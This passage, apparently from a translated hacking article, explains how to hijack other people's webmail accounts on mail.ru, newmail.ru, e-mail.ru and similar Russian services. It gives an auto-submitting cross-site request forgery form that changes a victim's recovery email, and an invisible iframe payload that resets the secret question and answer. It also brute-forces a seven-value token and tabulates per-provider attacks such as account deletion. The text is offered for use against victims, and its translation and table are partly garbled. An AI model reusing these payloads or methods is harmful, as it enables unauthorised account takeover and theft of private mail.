However, the GET method cannot change settings in the mail.ru box, therefore I will describe the technical side of the issue in detail.
I. We send a letter with a code to the necessary box with a code that will generate a frame directly in the body of the letter with a link to our website. If possible, the script should be triggered without any user interaction (click, click, mouse over, image loading, etc.):
Ii. On the http://yoursite.ru resource we place an HTML document with the form for sending the changed data to the mail.ru server.
<form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br> <input type = "hidden" name = "page" value = "2"> <br> <input type = "hidden" name = "Email" value = "firstname.lastname@example.org"> <br> <input type = "hidden" value = "Save" name = "Save"> <br> </ form> <br> <script> <br> document.anketa.submit (); <br> </ script>Notes: the work of the client part of the script in unchanged form is guaranteed only for IE; The dispatch form is placed on a separate site specifically to “unload” the letter.
Introduce the script through the style tag.
Address of the settings page: http://mail01.mail.com/scripts/common/genprofile.cgi
Form Name: profileform
The name of the text field with a secret answer: hint_a
WWW.NEWMAIL.RUIn my opinion, quite a popular mailer, so I will tell about it in detail. Moreover, it is much easier to get someone else’s account on it than it seems at first glance. You can do this: send an email with a script that, when launched, will receive the session id , form the necessary requests, and change the settings for the altrenative email (to which the password will be sent later) and the secret question and answer. However, if you specify any other address when reminding you, the password will be sent to it, if only the secret answer is correct. And the following observation: the session id to change the settings can not be used at all. Plus, any tags are allowed. All of the above reduces the amount of code to a couple of lines:
<iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANSWER width = 0 height = 0> </ iframe>
The hacking method of e-mail.ru somewhat does not fit into the general theme of the article, but still - mail . When I needed to get a password from one mailbox, I normally registered my account and began to investigate the system. The first thing that caught my eye was the ability to set a new password and a secret question with an answer, without entering the old password. The usual action plan: check the tag filtering, get the ID and execute the request. However, to change the settings, the special variable utoken was used, which is contained in the body of the document. Experimenting with changing the question and answer with the previously known utoken:
I came concludes that ID and cookies are not required to change the settings. At the same time, after observing utoken, it was found that the four-digit hexadecimal number after the email address email@example.com lies in a very narrow range. Namely, to establish a secret question with the answer on any box of interest to us, you need to go through all 7 options: 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . When the number is guessed, we get into the right box.
Notes: At this point there have been some changes. The password recovery service does not work, so it makes sense to change it immediately. Address change settings also changed:
The method does not work forever. Probably, it is still required that the user from time to time went to the mail via the web .
Table with the characteristics of free WWW-servers
inbox.ru , bk.ru , list.ru ,
email.com , post.com , myself.com , consultant.com , etc.
nm.ru , hotmail.ru , orc.ru , nightmail.ru
|Any way||Read / change question and answer. Password is valid|
| www.netman.ru and www.mailgate.ru
same mailer. about 80 domains
|www.yandex.ru||OnError, OnLoad||Deleting site * .narod.ru (JS is not required)|
|www.ukr.net|| embed src = javasc
ript: this .wav>
|Read the answer to your secret question.|
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
pochta.ru , pisem.net , fromru.com , land.ru , and others.
|In many ways||Account deleting|